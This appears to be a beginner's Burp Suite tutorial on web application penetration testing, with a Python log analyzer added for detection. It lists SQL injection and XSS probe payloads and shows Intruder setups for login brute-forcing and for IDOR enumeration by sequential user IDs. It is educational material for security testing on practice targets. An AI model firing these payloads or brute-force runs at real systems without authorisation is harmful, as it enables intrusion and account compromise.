Burp Suite Tutorial: Web Application Hacking for Beginners (2026 Edition)

SCRs Team
March 13, 2026

Why Burp Suite Is the #1 Web Hacking Tool

Burp Suite is used by over 70,000 security professionals worldwide. It's the industry standard for web application penetration testing — combining an intercepting proxy, scanner, and manual testing tools in one platform.

Edition        Price       Best For
Community      Free        Learning, basic manual testing
Professional   $449/year   Professional pentesting
Enterprise     Custom      CI/CD integration, team scanning

You can follow this entire tutorial with the free Community Edition.


Step 1: Installation & Browser Setup

Install Burp Suite

# Download from PortSwigger
# https://portswigger.net/burp/communitydownload

# macOS (via Homebrew)
brew install --cask burp-suite

# Linux (direct download)
chmod +x burpsuite_community_linux_*.sh
./burpsuite_community_linux_*.sh

Configure Browser Proxy

Burp intercepts traffic by acting as a proxy between your browser and the target.

  1. Open Burp Suite → Start with default settings
  2. Proxy tab → Note the proxy is on 127.0.0.1:8080
  3. Browser setup:
     Firefox (recommended):
       Settings → Network Settings → Manual Proxy → 127.0.0.1:8080
     Chrome (use FoxyProxy extension):
       Install FoxyProxy → Add proxy: 127.0.0.1:8080 → Enable
  4. Install Burp's CA certificate (for HTTPS interception):
     • Browse to http://burp
     • Download CA Certificate
     • Import into browser's certificate store

Step 2: Understanding the Interface

Key Tabs

Tab         Purpose
Proxy       Intercept, modify, and forward HTTP requests
Target      Site map and scope configuration
Repeater    Manually modify and resend requests
Intruder    Automated parameter fuzzing and brute-forcing
Scanner     Automated vulnerability scanning (Pro)
Decoder     Encode/decode data (Base64, URL, hex)
Comparer    Diff two responses to spot differences

Step 3: Intercepting and Modifying Requests

Practice Target

Use a deliberately vulnerable app:

# DVWA (Damn Vulnerable Web Application)
docker run -d -p 80:80 vulnerables/web-dvwa

# OWASP Juice Shop
docker run -d -p 3000:3000 bkimminich/juice-shop

# PortSwigger labs (browser-based)
# https://portswigger.net/web-security

Intercept a Login Request

  1. Turn on interception: Proxy → Intercept → Intercept is on
  2. Submit a login form on your target
  3. Burp catches the request:
     POST /login HTTP/2
     Host: target.com
     Content-Type: application/x-www-form-urlencoded

     username=admin&password=test123
  4. Modify the request — change parameters, headers, cookies
  5. Click Forward to send it, or Drop to cancel

Step 4: Using Repeater for Manual Testing

Repeater lets you send the same request over and over with modifications — essential for testing injection attacks.

Testing for SQL Injection

  1. Capture a request with a parameter: ?id=1
  2. Send to Repeater (Ctrl+R)
  3. Try injection payloads:
Original:  ?id=1
Test 1:    ?id=1'              → Look for SQL error
Test 2:    ?id=1 OR 1=1        → Look for different response
Test 3:    ?id=1 UNION SELECT null,null,null → Determine column count
Test 4:    ?id=1 UNION SELECT username,password,null FROM users

Testing for XSS

Original:  ?search=hello
Test 1:    ?search=<script>alert(1)</script>
Test 2:    ?search="><img src=x onerror=alert(1)>
Test 3:    ?search=javascript:alert(1)
Test 4:    ?search={{7*7}}      → Template injection check

Step 5: Using Intruder for Automated Attacks

Brute-Forcing a Login

  1. Capture a login request
  2. Send to Intruder (Ctrl+I)
  3. Set attack positions:
     POST /login HTTP/2
     Host: target.com

     username=§admin§&password=§test§
  4. Set payloads:
     • Position 1: Usernames wordlist
     • Position 2: Passwords wordlist (rockyou-top-1000.txt)
  5. Set attack type: Cluster Bomb (tests all combinations)
  6. Start attack → Look for different response length/status code

Parameter Fuzzing for IDOR

GET /api/users/§1§/profile HTTP/2
Host: target.com
Authorization: Bearer your-token-here

Set payload: Numbers 1-1000. Look for 200 responses to IDs that aren't yours.
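As an added example (not part of the original tutorial), here is the defender's side of Steps 4 and 5: a small Python analyzer that runs over a constructed access-log sample and flags the Repeater probe payloads listed above (URL-decoded first, since that is how they reach the server) as well as the volume patterns an Intruder run leaves behind, a burst of rejected logins and one client walking through sequential profile IDs. The log format, the thresholds and the IP addresses are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit
# Constructed sample access log ("ip method path status" per line), not real traffic.
SAMPLE_LOG = "\n".join(
    ["10.0.0.5 GET /product?id=1%27 500",                # ' -> server threw a SQL error
     "10.0.0.5 GET /product?id=1%20OR%201%3D1 200",
     "10.0.0.5 GET /product?id=1%20UNION%20SELECT%20null,null,null 200",
     "10.0.0.5 GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E 200",
     "10.0.0.5 GET /search?q=%7B%7B7*7%7D%7D 200",
     "10.0.0.7 GET /search?q=o%27neil 200"]              # benign apostrophe, normal 200
    + ["10.0.0.9 POST /login 401"] * 12                  # Cluster Bomb credential run
    + [f"10.0.0.9 GET /api/users/{i}/profile 200" for i in range(1, 9)]  # IDOR sweep
)
LOG_LINE = re.compile(r"^(\S+) (GET|POST) (\S+) (\d{3})$", re.M)
PROFILE_PATH = re.compile(r"^/api/users/(\d+)/profile$")
# Signatures for the Repeater probes shown above, matched on the URL-decoded query string.
PROBE_SIGNATURES = {
    "sqli_boolean": re.compile(r"\bor\b\s+\d+\s*=\s*\d+", re.I),
    "sqli_union": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    "xss": re.compile(r"<script|\bonerror\s*=|javascript:", re.I),
    "ssti": re.compile(r"\{\{.+?\}\}"),
}

def classify_request(path: str, status: int) -> set:
    """Probe labels for one request. A bare quote is too noisy to flag alone (names
    contain them), so it is only reported when the server answered 5xx."""
    query = unquote_plus(urlsplit(path).query)
    labels = {name for name, rx in PROBE_SIGNATURES.items() if rx.search(query)}
    if "'" in query and status >= 500:
        labels.add("sqli_error")
    return labels

def analyze(log_text: str, login_threshold: int = 10, idor_threshold: int = 5) -> dict:
    """Per-IP findings: signature hits plus the volume patterns Intruder produces."""
    hits, failed, ids = defaultdict(set), defaultdict(int), defaultdict(set)
    for m in LOG_LINE.finditer(log_text):
        ip, method, path, status = m[1], m[2], m[3], int(m[4])
        hits[ip] |= classify_request(path, status)
        route = urlsplit(path).path
        if method == "POST" and route == "/login" and status in (401, 403):
            failed[ip] += 1
            if failed[ip] == login_threshold:       # many rejected logins from one client
                hits[ip].add("login_bruteforce")
        elif (pm := PROFILE_PATH.match(route)):
            ids[ip].add(int(pm[1]))
            if len(ids[ip]) == idor_threshold:      # one client walking many profile IDs
                hits[ip].add("idor_enumeration")
    return {ip: sorted(labels) for ip, labels in hits.items() if labels}
```

Run analyze(SAMPLE_LOG) to see both probing clients flagged while the benign apostrophe request is not; tune the thresholds to the application's real traffic, since the quote-plus-5xx rule is deliberately conservative.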


Step 6: Useful Burp Extensions

Install from Extender → BApp Store:

Extension         Purpose
Autorize          Automatic authorization testing (IDOR detection)
Logger++          Enhanced request/response logging
JSON Beautifier   Format JSON in Proxy/Repeater
Param Miner       Discover hidden parameters
Turbo Intruder    Faster Intruder with Python scripting
JWT Editor        Decode, modify, and forge JWT tokens
Hackvertor        Advanced encoding/tag-based transformations

Step 7: OWASP Top 10 Testing with Burp

Vulnerability               Burp Technique
Broken Access Control       Intruder IDOR fuzzing + Autorize extension
Injection (SQL/XSS)         Repeater with payloads + Scanner (Pro)
Auth Bypass                 Repeater — modify JWT, session cookies
SSRF                        Repeater — inject internal URLs in parameters
Security Misconfiguration   Check response headers, error pages
Sensitive Data Exposure     Search Proxy history for tokens, passwords

Quick Reference: Essential Keyboard Shortcuts

Shortcut       Action
Ctrl+R         Send to Repeater
Ctrl+I         Send to Intruder
Ctrl+Space     Forward intercepted request
Ctrl+Shift+D   Send to Decoder
Ctrl+F         Search in response

The best way to learn Burp Suite is to practice. Start with PortSwigger Web Security Academy labs — they're free, browser-based, and cover every OWASP vulnerability with step-by-step solutions.

Published by SecureCodeReviews